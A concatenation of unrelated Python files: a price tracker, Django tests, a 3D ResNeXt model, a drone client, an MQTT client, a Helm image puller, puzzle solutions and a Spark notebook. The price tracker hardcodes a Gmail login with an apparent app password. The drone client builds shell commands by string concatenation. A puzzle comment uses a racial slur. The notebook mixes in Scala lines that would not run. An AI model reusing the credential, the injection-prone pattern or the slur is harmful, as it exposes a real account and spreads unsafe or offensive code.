else:
self.files.append(file)
return True
def get_subdirs(self, path=None):
subdirs = []
if path and path != '' and path != './':
subdir = path.split('/')[0]
if subdir in self.subdirs:
searchpath = '/'.join(path.split('/')[1::])
subdirs = self.subdirs[subdir].get_subdirs(searchpath)
subdirs = list(map(lambda subsubdir: os.path.join(subdir, subsubdir), subdirs))
else:
subdirs = self.subdirs
return subdirs
def get_subdirs_recursively(self, path=None):
subdirs = []
if path and path != '' and path != './':
subdir = path.split('/')[0]
if subdir in self.subdirs:
searchpath = '/'.join(path.split('/')[1::])
subdirs = self.subdirs[subdir].get_subdirs_recursively(searchpath)
else:
subdirs = list(self.subdirs.keys())
for key, val in self.subdirs.items():
subdirs.extend(map(lambda subdir: key + '/' + subdir, val.get_subdirs_recursively()))
subdirs.sort()
return subdirs
def get_files(self, path=None):
files = []
if path and path != '' and path != './':
subdir = path.split('/')[0]
if subdir in self.subdirs:
searchpath = '/'.join(path.split('/')[1::])
files = self.subdirs[subdir].get_files(searchpath)
else:
files = self.files
return files
def get_files_recursively(self, path=None):
files = []
if path and path != '' and path != './':
subdir = path.split('/')[0]
if subdir in self.subdirs:
searchpath = '/'.join(path.split('/')[1::])
files = self.subdirs[subdir].get_files_recursively(searchpath)
else:
files = self.files
for key, val in self.subdirs.items():
files.extend(map(lambda file: key + '/' + file, val.get_files_recursively()))
return files
def render_text(self, ident=0):
print('{}{}/'.format(' ' * (ident * 4), self.name))
for key, val in self.subdirs.items():
val.render_text(ident + 1)
for file in self.files:
print('{}{}'.format(' ' * (ident + 1) * 4, file))
# Parse the html from the message to get the URL
def get_url_from_input(string):
if string.startswith('http'):
return string
p = re.compile('href="(.+?)"', re.IGNORECASE)
res = re.search(p, string)
if res:
return res.group(1)
else:
return False
def youtube_search(query):
global log
try:
r = requests.get("https://www.youtube.com/results", params={'search_query': query}, timeout=5)
results = re.findall("watch\?v=(.*?)\".*?title=\"(.*?)\".*?"
"(?:user|channel).*?>(.*?)<", r.text) # (id, title, uploader)
if len(results) > 0:
return results
except (requests.exceptions.ConnectionError, requests.exceptions.HTTPError, requests.exceptions.Timeout) as e:
error_traceback = traceback.format_exc().split("During")[0]
log.error("util: youtube query failed with error:\n %s" % error_traceback)
return False
|
import requests
from bs4 import BeautifulSoup
import smtplib
import time
import mysql.connector
from datetime import date
from datetime import datetime
conn=mysql.connector.connect(user='root',passwd='root',host='localhost',database='Project')
mycursor=conn.cursor()
print("-------------------------------------------------------------------------------------------------")
print("\n \t\tHELLO WELCOME TO ONLINE PRICE TRACKER:-")
print("-------------------------------------------------------------------------------------------------")
URL=input("\nEnter the link of the product to be monitered:-")
print("-------------------------------------------------------------------------------------------------")
ma=input("\nEnter the E_mail Address on which yo want to get notified:")
print("-------------------------------------------------------------------------------------------------")
pri=input("\nEnter the price to be compared:")
print("-------------------------------------------------------------------------------------------------")
dat=date.today()
pri=int(pri)
headers={"User-Agent":'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'}
def check_price():
page = requests.get(URL, headers=headers)
soup=BeautifulSoup(page.content, 'html.parser')
title = soup.find(id="productTitle").get_text()
print("\n")
print(title.strip())
print("-------------------------------------------------------------------------------------------------")
print("\n")
price =soup.find(id="priceblock_ourprice").get_text()
price2=price[2:6]
converted_price = float(price[2:4])
#print (converted_price)
fullp=converted_price
converted_price=converted_price*1000
fullp=fullp*1000
print(current_time)
if(converted_price<pri):
mycursor.execute("INSERT INTO Proj1(email,pri,date1,time1) VALUES(%s, %s, %s , %s)",(ma,fullp,dat,current_time))
#print(fullp)
conn.commit()
send_mail()
print("-------------------------------------------------------------------------------------------------")
def send_mail():
server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
server.ehlo()
server.login('patil.pratik989098@gmail.com','ojuizjfxcadhgjrw')
subject = 'Price fell down!!!'
body = 'Check the amazon link: https://www.amazon.in/VivoBook-PCIEG-256GB-Windows-X509UA-EJ362T/dp/B07WNGR6MJ/ref=sr_1_1_sspa?keywords=asus+vivobook+x509&qid=1568964886&s=gateway&sr=8-1-spons&psc=1&spLa=ZW5jcnlwdGVkUXVhbGlmaWVyPUFNMEdGTEhJM09WQ0ImZW5jcnlwdGVkSWQ9QTEwMTc4NzExNzhPUDZRMFc0MDUyJmVuY3J5cHRlZEFkSWQ9QTAxODAwMjExQlhFTDI5SVJaMlpCJndpZGdldE5hbWU9c3BfYXRmJmFjdGlvbj1jbGlja1JlZGlyZWN0JmRvTm90TG9nQ2xpY2s9dHJ1ZQ=='
msg = f"Subject: {subject}\n\n{body}"
server.sendmail('patil.pratik989098@gmail.com',ma,msg)
print('Hey Email has been sent!!')
server.quit()
while(True):
now =datetime.now()
current_time = now.strftime("%H:%M:%S")
check_price()
time.sleep(60)
|
from django.test import TestCase
from .models import Feature
from .forms import featureForm
from django.contrib.auth.models import User
from django.contrib import messages
class TestViews(TestCase):
def test_get_all_features_page(self):
page = self.client.get('/features/')
self.assertEqual(page.status_code, 200)
self.assertTemplateUsed(page, 'features.html')
def test_feature_detail(self):
user = User.objects.create_user(username='test_user', password='password')
self.client.login(username='test_user', password='password')
feature = Feature(featureName='Test Feature', author=user)
feature.save()
page = self.client.get('/features/{0}'.format(feature.id), follow=True)
self.assertEqual(page.status_code, 200)
self.assertTemplateUsed(page, 'feature.html')
def test_post_request_feature(self):
user = User.objects.create_user(username='test_user', password='password')
self.client.login(username='test_user', password='password')
page = self.client.post('/features/', {
'description':'test content',
'featureName': 'test feature',
},
follow=True)
self.assertEqual(page.status_code, 200)
self.assertTemplateUsed(page, 'features.html')
def test_feature_form(self):
user = User.objects.create_user(username='test_user', password='password')
self.client.login(username='test_user', password='password')
featureform = featureForm(data={'featureName': 'testFeature', 'description': 'testDescription'})
self.assertTrue(featureform.is_valid())
def test_feature_form_missing_field(self):
user = User.objects.create_user(username='test_user', password='password')
self.client.login(username='test_user', password='password')
featureform = featureForm(data={'ticketName': '', 'description': 'testDescription'})
self.assertFalse(featureform.is_valid())
|
from django.forms.widgets import HiddenInput
from .models import Comment, UserLike, UserDislike
from django import forms
class CommentForm(forms.ModelForm):
class Meta:
model = Comment
fields = ('body',)
widgets = {'comment': HiddenInput()}
class LikeForm(forms.ModelForm):
class Meta:
model = UserLike
fields = ()
widgets = {'post': HiddenInput()}
class DislikeForm(forms.ModelForm):
class Meta:
model = UserDislike
fields = ()
widgets = {'post': HiddenInput()} |
from functools import partial, reduce
import tensorflow as tf
import tensorflow.keras as keras
from tensorflow.keras.layers import Dense, Lambda, Conv3D
from tensorflow.keras.layers import Activation, BatchNormalization
from tensorflow.keras.layers import Input, concatenate, Add, Flatten, Reshape, Dropout
from tensorflow.keras.layers import GlobalAveragePooling3D, GlobalMaxPooling3D, MaxPooling3D
from tensorflow.keras.utils import plot_model
from tensorflow.keras.models import Model
def __default_conv3D(input, filters=8, kernel_size=3, strides=(1,1,1), weight_decay = 1e-4, **kwargs):
'''
Description: set up defaut parameters for Conv3D layers
'''
DefaultConv3D = partial(
keras.layers.Conv3D,
filters = filters,
kernel_size=kernel_size,
strides=strides,
padding="SAME",
use_bias=True,
kernel_regularizer = keras.regularizers.l2(weight_decay),
kernel_initializer="he_normal",
**kwargs
)
return DefaultConv3D()(input)
def __init_conv(input, filters=64, strides=(1,1,1), weight_decay=5e-4):
'''
Description: initial convolutional layers before ResNeXt block
Args: input: input tensor
filters: number of filters
strides: strides, must be a tuple
weight_decay: parameter for l2 regularization
Return: output tensor
'''
x = __default_conv3D(input, filters=filters, strides=strides, weight_decay=5e-4)
x = BatchNormalization(axis = -1)(x)
x = Activation('relu')(x)
x = MaxPooling3D(pool_size = (2,2,2))(x)
return x
def __init_grouped_conv(input, filters = 128, strides = (1,1,1), weight_decay = 5e-4):
init = __default_conv3D(input, filters = filters - input.shape[-1] * 2, strides=strides, weight_decay=weight_decay)
group_channel = [init]
for i in range(input.shape[-1]):
x = Lambda(lambda z:z[:, :, :, :, i])(input)
x = tf.keras.backend.expand_dims(x, -1)
x = __default_conv3D(x, filters = filters, strides = strides, weight_decay=weight_decay)
group_channel.append(x)
group_merge = concatenate(group_channel, axis = -1)
x = BatchNormalization()(group_merge)
x = Activation('relu')(x)
return x
def __init_split_conv(input, filters = 8, strides = (1,1,1), weight_decay = 5e-4):
group_channel = []
for i in range(input.shape[-1]):
x = Lambda(lambda z:z[:, :, :, :, i])(input)
x = tf.keras.backend.expand_dims(x, -1)
x = __default_conv3D(x, filters = filters, strides = strides, weight_decay=weight_decay)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x_orig = __default_conv3D(x, kernel_size=1, filters = filters, strides = (2,2,2), weight_decay=weight_decay)
x = __default_conv3D(x, kernel_size=1, filters = filters // 2, strides = (2,2,2), weight_decay=weight_decay)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = __default_conv3D(x, kernel_size=3, filters = filters, strides = (1,1,1), weight_decay=weight_decay)
x = x + x_orig
x = BatchNormalization()(x)
x = Activation('relu')(x)
group_channel.append(x)
group_merge = concatenate(group_channel, axis = -1)
x = BatchNormalization()(group_merge)
x = Activation('relu')(x)
return x
def __bottleneck_layer(input, filters = 64, kernel_size = 3, strides = (1,1,1), cardinality = 16, weight_decay = 5e-4):
'''
Description: bottleneck layer for a single path(cardinality = 1)
Args: input: input tensor
filters : number of filters for the last layer in a single path, suppose to be total number
of filters // cardinality of ResNeXt block.
strides : strides, must be tuple of 3 elements
'''
x = input
x = __default_conv3D(x, filters = filters // 2 // cardinality, kernel_size = 1, strides = strides)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = __default_conv3D(x, filters = filters // 2 // cardinality, kernel_size = kernel_size, strides = (1,1,1))
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = __default_conv3D(x, filters = filters, kernel_size = 1, strides = (1,1,1))
x = BatchNormalization()(x)
return x
def __ResNeXt_block(input, filters = 64, kernel_size = 3, strides = (1,1,1), cardinality = 16, weight_decay = 5e-4):
'''
Description: refer to the ResNeXt architechture. One ResNeXt_block contains several paths (cardinality) of bottleneck layers joint by a skip connection.
'''
if strides[0] == 1:
init = input
elif strides[0] > 1:
init = __default_conv3D(input, filters = filters, kernel_size=kernel_size, strides=strides, weight_decay = weight_decay)
init = BatchNormalization()(init)
x = [init]
for i in range(cardinality):
x_sub = __bottleneck_layer(input, filters = filters, kernel_size=kernel_size, strides=strides, cardinality=cardinality, weight_decay=weight_decay)
x_sub = BatchNormalization()(x_sub)
x.append(x_sub)
x = Add()(x)
x = Activation('relu')(x)
return x
def create_model(input, filters = 64, depth = (2,2,2), cardinality = 16, weight_decay = 5e-4):
'''
Description:
Args: input: input tf tensor
filters: filter numbers of initial convolutional layer and first chunk ResNeXt blocks. Filter number doubles there after
depth: a tuple of number of ResNeXt blocks for each step of feature map resolution.
cardinality: number of bottleneck layer paths
weight_decay: l2 regularization parameter
Return: output: output tf tensor
'''
N = len(depth)
filter_list = []
for i in range(N):
filter_list.append(filters * (2**i))
x = __init_conv(input, filters=filters, strides=(2,2,2), weight_decay=weight_decay)
for dep, filters in zip(depth, filter_list):
for i in range(dep):
strides = (2,2,2) if i == 0 else (1,1,1)
x = __ResNeXt_block(x, filters = filters, strides=strides, cardinality = cardinality, weight_decay = weight_decay)
x = GlobalAveragePooling3D()(x)
x = Flatten()(x)
x = Dense(5)(x)
return x
def create_model_v2(input, filters = 8, weight_decay = 5e-4, dropout = 0.2):
x = __init_split_conv(input, filters = filters)
x = __default_conv3D(x, filters = 1024, strides=(2,2,2), weight_decay = weight_decay)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = GlobalAveragePooling3D()(x)
x = Flatten()(x)
y = []
for i in range(5):
_y = Dense(128)(x)
_y = Dropout(dropout)(_y)
_y = Dense(1)(_y)
y.append(_y)
y = concatenate(y, axis = -1)
return y
if __name__ == "__main__":
import numpy as np
gpus = tf.config.experimental.list_physical_devices('GPU')
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
input = Input(shape = (53, 63, 52, 53), batch_size = 4, dtype = tf.float32)
output = create_model(input, filters = 128)
model = Model(input, output)
optimizer = keras.optimizers.RMSprop(0.001)
model.compile(loss="mse",
optimizer=optimizer,
metrics=["mse", "mae"],
experimental_run_tf_function=False)
x = tf.constant(np.zeros(shape = (8, 53, 63, 52, 53), dtype = np.float32))
y = tf.constant(np.zeros(shape = (8,5), dtype = np.float32))
z = __init_grouped_conv(x, strides = (2,2,2))
#model.fit(x,y,epochs = 3)
#model.summary()
|
import logging, time, argparse, configparser, sys
import socket, os, signal, psutil
from subprocess import Popen
from drone import Drone
from connection_watchdog import ConnectionWatchdog
from data_receiver import DataReceiver
from utils import Utils
parser = argparse.ArgumentParser()
parser.add_argument('--d', nargs=1, default=None)
args = parser.parse_args()
APP_DIR = args.d[0] if args.d != None else "./"
CONFIGURATIONS = APP_DIR + 'configuration.ini'
logging.basicConfig(
level=logging.DEBUG,
format="%(asctime)s [%(levelname)s] %(message)s",
handlers=[
logging.FileHandler(APP_DIR + 'logs/main app | ' + str(time.asctime()) + '.log'),
logging.StreamHandler()
]
)
config = configparser.ConfigParser()
if len(config.read(CONFIGURATIONS)) == 0:
logging.error("Could Not Read Configurations File: " + CONFIGURATIONS)
sys.exit()
DRONE_ID = config['drone']['id']
HOST_IP = config['cloud-app']['ip']
DRONE_CLOUD_SERVER_PORT = int( config['cloud-app']['control-port'])
MAX_RECONNECTION_ATTEMPTS = int( config['cloud-app']['max-reconnection-attempts'])
if __name__ == '__main__':
while(True):
try:
drone = Drone(config)
break
except Exception as e:
logging.error(str(e), exc_info=True)
time.sleep(2)
watchdog = ConnectionWatchdog(drone, HOST_IP, MAX_RECONNECTION_ATTEMPTS)
watchdog.start()
video_streamer_proc = None
control_server_socket = None
server_message_receiver = None
while drone.is_active:
try:
while not watchdog.net_status:
time.sleep(1)
time.sleep(3)
control_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
control_server_socket.connect((HOST_IP, DRONE_CLOUD_SERVER_PORT))
logging.info('Socket Connection Opened')
droneIdBytes = Utils.createNetworkMessage(str.encode(DRONE_ID))
control_server_socket.send(droneIdBytes)
logging.info('Drone ID: %s Connected To Control Server Endpoint: %s:%s', str(DRONE_ID), HOST_IP, str(DRONE_CLOUD_SERVER_PORT))
video_streamer_proc = Popen('/usr/bin/python3 ' + APP_DIR + 'video_streamer.py', shell=True)
server_message_receiver = DataReceiver(control_server_socket, drone)
server_message_receiver.start()
while watchdog.net_status and drone.is_active:
msg = Utils.createNetworkMessage(drone.getDroneDataSerialized())
control_server_socket.send(msg)
time.sleep(1)
except Exception as e:
logging.error(str(e), exc_info=True)
drone.freeze()
finally:
if video_streamer_proc != None:
current_process = psutil.Process(video_streamer_proc.pid)
children = current_process.children(recursive=True)
for child in children:
if child.pid != os.getpid():
os.kill(child.pid, signal.SIGKILL)
os.kill(video_streamer_proc.pid, signal.SIGKILL)
if control_server_socket != None:
control_server_socket.close()
if server_message_receiver != None:
server_message_receiver.stop()
drone.close()
logging.info('Drone Offline') |
#Advent of Code 2020 - Day 10
def get_input(file):
with open(file, 'r') as f:
return [0] + [int(x) for x in f.read().split("\n")]
input_jolts = sorted(get_input("day10_input.txt"))
test_jolts = sorted(get_input("day10_test.txt"))
def use_all(input_val):
difference_dict = {
1:0,
2:0,
3:1
}
for x in range(len(input_val) - 1):
difference_dict[input_val[x+1] - input_val[x]] += 1
return difference_dict[1] * difference_dict[3]
#print (use_all(input_jolts))
def find_all_combinations(input_val):
full_tree = {0:[]}
for x in range(len(input_val) - 2):
try:
next_three = [input_val[x+1], input_val[x+2], input_val[x+3]]
except IndexError:
next_three = [input_val[x+1], input_val[x+2], 0]
for element in range(len(next_three)):
if next_three[element] - input_val[x] in [1,2,3]:
full_tree[input_val[x]].append(next_three[element])
full_tree[next_three[element]] = []
full_tree[input_val[-1]] = []
return full_tree
print (find_all_combinations(test_jolts))
def part2(input_val):
tree = find_all_combinations(input_val)
input_val = input_val[::-1]
paths = {}
last_split = 1
for x in range(len(input_val)):
current_adapter = input_val[x]
if len(tree[current_adapter]) > 1:
paths[current_adapter] = sum(paths[x] for x in tree[current_adapter])
last_split = paths[current_adapter]
else:
paths[current_adapter] = last_split
return paths[0]
print (part2(input_jolts)) |
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
ana.py geometrical and plotting utils
========================================
TODO: reposition these into more appropriate locations
"""
import os, logging, sys
import numpy as np
from opticks.ana.base import opticks_main
from opticks.ana.nbase import count_unique, vnorm
from opticks.ana.evt import Evt, costheta_
deg = np.pi/180.
log = logging.getLogger(__name__)
X,Y,Z,W = 0,1,2,3
def theta(xyz):
"""
:param xyz: array of cartesian coordinates
:return: array of Spherical Coordinare polar angle, theta in degrees
First subtract off any needed translations to align
the coordinate system with focal points.
Spherical Coordinates (where theta is polar angle 0:pi, phi is azimuthal 0:2pi)
x = r sin(th) cos(ph) = r st cp
y = r sin(th) sin(ph) = r st sp
z = r cos(th) = r ct
sqrt(x*x + y*y) = r sin(th)
z = r cos(th)
atan( sqrt(x*x+y*y) / z ) = th
"""
#r = np.linalg.norm(xyz, ord=2, axis=1)
r = vnorm(xyz)
z = xyz[:,2]
th = np.arccos(z/r)*180./np.pi
return th
def scatter3d(fig, xyz):
ax = fig.add_subplot(111, projection='3d')
ax.scatter(xyz[:,0], xyz[:,1], xyz[:,2])
def histo(fig, vals):
ax = fig.add_subplot(111)
ax.hist(vals, bins=91,range=[0,90])
def xyz3d(fig, path):
xyz = np.load(path).reshape(-1,3)
ax = fig.add_subplot(111, projection='3d')
ax.scatter(xyz[:,0], xyz[:,1], xyz[:,2])
class Rat(object):
def __init__(self, n, d, label=""):
n = len(n)
d = len(d)
r = float(n)/float(d)
self.n = n
self.d = d
self.r = r
self.label = label
def __repr__(self):
return "Rat %s %s/%s %5.3f " % (self.label,self.n, self.d, self.r)
def recpos_plot(fig, evts, irec=0, nb=100, origin=[0,0,0] ):
origin = np.asarray(origin)
nr = len(evts)
nc = 3
clab = ["X","Y","Z"]
for ir,evt in enumerate(evts):
pos = evt.rpost_(irec)[:,:3] - origin
for ic, lab in enumerate(clab):
ax = fig.add_subplot(nr,nc,1+ic+nc*ir)
ax.hist(pos[:,ic],bins=nb)
ax.set_xlabel(lab)
def angle_plot(fig, evts, irec=0, axis=[0,0,1], origin=[0,0,-200], nb=100):
origin = np.asarray(origin)
nc = len(evts)
nr = 1
for ic,evt in enumerate(evts):
pos = evt.rpost_(irec)[:,:3] - origin
axis_ = np.tile(axis, len(pos)).reshape(-1, len(axis))
ct = costheta_(pos, axis_)
th = np.arccos(ct)/deg
ax = fig.add_subplot(nr,nc,1+ic)
ax.hist(th, bins=nb)
ax.set_xlabel("angle to axis %s " % str(axis))
if __name__ == '__main__':
args = opticks_main(tag="5", det="rainbow", src="torch")
try:
evt = Evt(tag=args.tag, det=args.det, src=args.src, args=args)
except IOError as err:
log.fatal(err)
sys.exit(args.mrc)
|
import os
import time
import logging
import paho.mqtt.client as mqtt
class mqttclient(object):
def __init__(self,logger):
_libName = str(__name__.rsplit('.', 1)[-1])
self._log = logging.getLogger(logger + '.' + _libName + '.' + self.__class__.__name__)
self._log.debug('Create MQTT mqttclient Object')
self._host =''
self._port = 1883
self._subscribe = {}
self._state = {'CONNECTED': False,
'SUBSCRIBED': False,
'PUBLISHED': 0}
# def __del__(self):
# print('delte')
# self._log.debug('Delete MQTT mqttclient Object')
def construct(self):
self._log.debug('Methode: construct ()')
self._mqttc = mqtt.Client(str(os.getpid()), clean_session=False)
self._mqttc.reconnect_delay_set(min_delay=5, max_delay=60)
self._mqttc.enable_logger(logging.getLogger('mqttClient'))
self._mqttc.on_message = self.on_message
self._mqttc.on_connect = self.on_connect
self._mqttc.on_publish = self.on_publish
self._mqttc.on_subscribe = self.on_subscribe
self._mqttc.on_disconnect = self.on_disconnect
return True
def connect(self, host, port=1883, keepalive=60, bind_address=""):
self._log.debug('Methode: connect(%s, %d, %d)' % (host, port, keepalive))
self._state['CONNECTED'] = False
self._mqttc.connect_async(host, port, keepalive, bind_address)
self._mqttc.loop_start()
for _x in range(30):
# print('1')
if self._state.get('CONNECTED',False):
# print('conn')
self._log.debug('Connected to host %s', host)
# self._mqttc.loop_start()
return True
else:
time.sleep(0.3)
return False
def on_connect(self, client, userdata, flags, rc):
self._log.debug('Methode: on_connect(%s, %s, %s , %s' % (client, userdata, flags, rc))
if rc == mqtt.CONNACK_ACCEPTED:
self._log.info('MQTT connected')
self._state['CONNECTED'] = True
else:
self._log.error('MQTT failed to connect: {}'.format(rc))
self._state['CONNECTED'] = False
return True
def disconnect(self):
self._log.debug('Methode: disconnect()')
# self._mqttc.wait_for_publish()
self._state['CONNECTED'] = False
self._mqttc.disconnect()
return True
def on_disconnect(self, client, userdata, rc):
self._log.debug('Methode: on_dissconnect(%s, %s, %s)' % (client, userdata, rc))
if rc != 0:
self._log.error('Unexpected disconnection.')
return True
def subscribe(self, topic):
self._log.debug('Methode: subscribe(%s)', topic)
(_result, _mid) = self._mqttc.subscribe(topic)
if _result == mqtt.MQTT_ERR_SUCCESS:
self._log.debug('Methode: subscribe() to topic %s with success' % topic)
else:
self._log.error('Methode: subscribe() failed to subscribe to topic %s' % topic)
return False
return True
def on_subscribe(self, mqttc, obj, mid, granted_qos):
self._log.debug('Methode: on_subscribe(%s, %s, %s, %s)' % (mqttc, obj, mid, granted_qos))
return True
def publish(self, topic, payload):
self._log.debug('Methode: publish(%s, %s)' % (topic, payload))
(_result, _mid) = self._mqttc.publish(topic, payload)
if _result == mqtt.MQTT_ERR_SUCCESS:
self._log.debug("Message {} queued successfully.".format(_mid))
for _x in range(3):
if self._state.get('PUBLISHED') == _mid:
self._log.debug('Message %d delivered', _mid)
return _mid
else:
time.sleep(0.3)
else:
self._log.error("Failed to publish message. Error: {}".format(_result))
return False
def on_publish(self, client, userdata, mid):
self._log.debug('Methode: on_publish(%s, %s, %s)' % (client, userdata, mid))
self._state['PUBLISHED'] =mid
return True
def on_message(self, client, userdata, message):
self._log.debug('Methode: on_message(%s, %s, %s)' % (client, userdata, message))
# print("Received message '" + str(message.payload) + "' on topic '"
# + message.topic + "' with QoS " + str(message.qos))
self._log.debug('Received message Topic: {}'.format(message.topic))
return message
def callback(self, topic, callback):
self._log.debug('Methode: callback add topic to callback(%s, %s' % (topic, callback))
self._mqttc.message_callback_add(topic, callback)
# print('callbvac',x)
# self._log.debug('Registerd Callback Topic: {}'.format(topic))
return True
def pushclient(self,config):
self._log.debug('Methode: pushclient(%s)',config)
self._host = str(config.get('HOST','localhost'))
self._port = int(config.get('PORT',1883))
self.construct()
return self.connect(self._host,self._port)
def fullclient(self,config):
self._log.debug('Methode: fullclient(%s)',config)
self._host = str(config.get('HOST','localhost'))
self._port = int(config.get('PORT',1883))
self._subscribtion = config.get('SUBSCRIPTION',None)
_result = False
self.construct()
if self.connect(self._host,self._port):
if self._subscribtion is not None:
# print('hier')
for item in self._subscribtion:
# print(item)
_topic = item.get('SUBSCRIBE')
_callback = item.get('CALLBACK',None)
if self.subscribe(_topic):
if _callback is not None:
self.callback(_topic,_callback)
else:
return (False,'Subscription Failed')
else:
return (False,'Not Connected')
return (True,'Connected')
class callmeback(object):
def callback1(self, client, userdata, msg):
print('callmeback1', client, userdata, msg)
print(msg.topic + " " + str(msg.qos) + " " + str(msg.payload))
def callback2(self, client, userdata, msg):
print('callmeback2', client, userdata, msg)
print(msg.topic + " " + str(msg.qos) + " " + str(msg.payload))
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger('mqttclient')
config1 = {'HOST': '192.168.20.205', 'CONFIG': '/TEST2/'}
callme = callmeback()
mqttpush = mqttclient('simpleExample')
print(mqttpush.pushclient(config1))
print(mqttpush.publish('/TEST/PUSH','1234567'))
mqttpush.disconnect()
time.sleep(10)
mqttfull = mqttclient('fullExample')
z={}
w={}
y=[]
z['SUBSCRIBE']='/TEST/FULL/2'
z['CALLBACK']=callme.callback2
w['SUBSCRIBE']='/TEST/FULL/1'
w['CALLBACK']=callme.callback1
y.append(z)
y.append(w)
config1['SUBSCRIPTION']=y
print(config1)
(state,message) = mqttfull.fullclient(config1)
print(state,message)
while True:
time.sleep(5)
# print(mqttfull.publish('/TEST/FULL/1', '12312412341235'))
if mqttfull.publish('/TEST/FULL/1','12312412341235') is not False:
print('TRUE')
# time.sleep(3)
else:
print('FALSE')
# time.sleep(3)
|
#!/usr/bin/env python3
import os
import subprocess
import sys
import tempfile
import yaml
def pull_docker_image(image):
pull_image = subprocess.Popen(['docker','pull',image], \
stdout=subprocess.PIPE)
(out,err) = pull_image.communicate()
print(out)
def download_container_images(manifest):
print("##### Download container images")
with open(manifest) as f:
releases = list(yaml.load_all(f, Loader=yaml.FullLoader))
for release in releases:
release['spec']['values']
name = release['spec']['chart']['name']
version = release['spec']['chart']['version']
repository = release['spec']['chart']['repository']
print("Chart Name: {}".format(name))
tmp = tempfile.NamedTemporaryFile(delete=False)
try:
tmp.write(yaml.dump(release['spec']['values']).encode())
tmp.flush()
print("helm template --repo {} --version {} -f {} {}".format(repository,version,tmp.name,name))
rawhelmtemplate = subprocess.Popen(['helm', 'template', \
'--repo', repository, \
'--version', version, \
'-f', tmp.name, \
name], \
stdout=subprocess.PIPE)
(out,err) = rawhelmtemplate.communicate()
helmyamls = yaml.load_all(out, Loader=yaml.SafeLoader)
for helmyaml in helmyamls:
if helmyaml is not None and 'spec' in helmyaml:
print(helmyaml)
spec = helmyaml['spec']
if 'template' in spec:
template = spec['template']
if 'spec' in template:
spec = template['spec']
if 'containers' in spec:
for container in spec['containers']:
print("Case 1 - container: {}".format(container['image']))
pull_docker_image(container['image'])
if 'initContainers' in spec:
for initcontainer in spec['initContainers']:
print("Case 2 - Init container: {}".format(initcontainer['image']))
pull_docker_image(initcontainer['image'])
if 'containers' in spec:
for container in spec['containers']:
print("Case 3 - spec container: {}".format(container['image']))
pull_docker_image(container['image'])
if 'image' in spec:
print("Case 4 - spec image: {}".format(spec['image']))
pull_docker_image(spec['image'])
finally:
os.unlink(tmp.name)
tmp.close()
def main():
if len(sys.argv) != 2:
print("Error: This file needs manifest argument.")
print("Usage: download_container_images.py <MANIFEST YAML>")
exit(1)
manifest = sys.argv[1]
download_container_images(manifest)
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# На судне находится 20 человек, между ними один негр. Вследствие недостатка в
# продовольствии один из команды должен быть выброшен за борт. Решено
# отсчитывать по семи и каждого седьмого освобождать; дойдя до конца ряда,
# переходить к его началу, не прерывая счёта. Оставшийся последним должен
# умереть. Негр (обозначенный перевернутой спичкой) может стать на любое место
# в ряду. С кого следует начинать счёт, чтобы негр оставался всегда последним?
def pos_of_killed(total, start, step, visualisate=False):
pool = range(total)
if visualisate:
print pool
pos = start
while len(pool) > 1:
pos = (pos + step - 1) % len(pool)
del pool[pos]
if visualisate:
print pool
return pool[0]
def should_start_from(total, start, step, pos_of_black):
offset = pos_of_killed(total, start, step)
good_start = (pos_of_black - offset) % total
print "Black is at position %d" % pos_of_black
print "We should start from %d" % good_start
pos_of_killed(total, good_start, step, True)
return good_start
assert should_start_from(20, 0, 7, 7) == 5
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from matplotlib.pylab import rcParams
rcParams['figure.figsize'] =15,9
import findspark
# In[2]:
import glob,csv
import pandas as pd
df = pd.concat([pd.read_csv(f, encoding='latin1', quoting=csv.QUOTE_NONE,error_bad_lines=False) for f in glob.glob(r'C:\Users\Lalith Chandra A\BDP_Project\temp_csv\*.csv')])
# In[3]:
from pyspark.sql import SparkSession, column
spark = SparkSession.builder.appName("Hive TST").enableHiveSupport().getOrCreate()
# In[4]:
spark
# In[5]:
spark_df=spark.createDataFrame(df)
# In[6]:
spark_df.show()
# In[7]:
spark_df.createOrReplaceTempView("streamed_tweets")
# In[ ]:
# In[10]:
import findspark
findspark.init('C:\spark-2.4.5-bin-hadoop2.7')
# May cause deprecation warnings, safe to ignore, they aren't errors
from pyspark import SparkContext
from pyspark.streaming import StreamingContext
from pyspark.sql import SQLContext
from pyspark.sql.functions import desc
from pyspark.sql import Row
import re
# Can only run this once. restart your kernel for any errors.
sc = SparkContext.getOrCreate()
# sc1 = SparkSession.builder.appName("Hive TST").enableHiveSupport().getOrCreate()
ssc = StreamingContext(sc, 10 )
sqlContext = SQLContext(sc)
import org.apache.spark.sql.hive.HiveContext
# In[9]:
import org.apache.spark.sql.hive.HiveContext
val hiveContext = new org.apache.spark.sql.hive.HiveContext(sc)
# In[7]:
df.head(20)
# In[8]:
((df[~(df['_1'].str.contains('[A-Za-z]'))].count()[0])/df.count()[0])*100
# In[9]:
df.rename(columns={'_1':'tweet_txt'},inplace=True)
# In[10]:
df.head()
# In[11]:
df.dtypes
# In[12]:
import re
def data_cleansing(corpus):
letters_only = re.sub("[^a-zA-Z]", " ", corpus)
words = letters_only.lower().split()
return( " ".join( words ))
df['tweet_txt'] = df['tweet_txt'].apply(lambda x:data_cleansing(x))
# In[13]:
df.head()
# In[14]:
